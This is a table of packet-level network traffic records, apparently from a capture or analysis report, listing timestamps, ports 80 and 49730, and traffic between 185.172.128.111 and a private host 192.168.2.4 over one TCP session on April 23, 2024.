Apr 23, 2024 09:27:04.782418966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782432079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782454967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782470942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782500982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782583952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782639027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782681942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782717943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782731056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782753944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782771111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782802105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782824039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782864094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782882929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782900095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782907009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782936096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782951117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782974005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782984972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783013105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783029079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783071995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783083916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783121109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783134937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783179998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783251047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783287048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783308029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783324957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783335924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783375978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783396006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783432007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783447981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783473015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.783477068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.783524036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833060980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833103895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833142042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833233118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833267927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833303928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833302021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833302975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833302975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833354950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833374023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833374023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833406925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833442926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833477974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833513975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833549023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833584070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833619118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833636045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833636999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833636999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833636999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833636999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833636999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833636999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833653927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833690882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833724022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833724022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833725929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833753109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833782911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833817959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833853960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833872080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833889961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833909988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833925962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833940029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.833961010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.833992004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834013939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834023952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834048986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834062099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834088087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834095955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834125042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834156990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834161043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834178925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834197998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834212065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834234953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834253073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834284067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834603071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834639072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.834660053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.834681034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.883743048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.883862972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.883899927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.883935928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.883971930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.883974075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.883974075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.883974075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.883974075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884007931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884044886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884080887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884097099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884097099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884097099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884135962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884150982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884171963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884181023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884210110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884216070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884253025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884773970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884813070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.884947062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.884948015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935669899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935710907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935746908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935807943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935843945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935872078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935878992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935873032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935873032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935873032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935914993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935937881 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935937881 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935951948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.935969114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.935991049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936008930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936028957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936048031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936084032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936218023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936254025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936289072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936325073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936358929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936393976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936415911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936415911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936415911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936417103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936417103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936480045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936511993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936548948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936572075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936584949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936594009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936620951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936640024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936656952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936671972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936692953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936712027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936729908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936744928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936765909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936783075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936805010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936819077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936841011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.936856031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.936892986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986119032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986171007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986217022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986226082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986226082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986272097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986298084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986314058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986320019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986363888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986367941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986417055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986423016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986464024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986465931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986517906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986519098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986561060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986573935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986618996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986769915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986824989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986848116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986881018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986881971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986922979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.986931086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986967087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.986974955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987025976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987052917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987078905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987332106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987370968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987397909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987406969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987425089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987443924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987457037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987479925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987497091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987517118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987526894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987552881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987569094 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987591028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987603903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987628937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987639904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987678051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987704039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.987746954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.987977982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988013983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988038063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988049030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988058090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988085985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988096952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988140106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988141060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988177061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988193035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988231897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988548040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988584042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988606930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988626957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988683939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988722086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.988739967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988770962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.988966942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989002943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989022017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989038944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989044905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989075899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989088058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989113092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989125013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989149094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989160061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989186049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989197969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989222050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989236116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989259005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989274979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989296913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989308119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989348888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989366055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989401102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989417076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989438057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989451885 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989474058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989485025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989511013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989521027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989547014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989558935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989583969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989595890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989619017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989630938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989655018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989671946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989691973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989706039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989727974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989737988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989763975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.989775896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.989809990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.039540052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.039602041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.039733887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.039741039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.039733887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.039783955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.039800882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.039834023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.039897919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.039935112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.039972067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040009022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040045023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040081024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040128946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040129900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040129900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040129900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040129900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040129900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040162086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040206909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040235996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040242910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040263891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040281057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040290117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040318012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040323019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040357113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040373087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040394068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040405035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040430069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040452957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040467024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040473938 CEST	49730	80	192.168.2.4	185.172.128.111
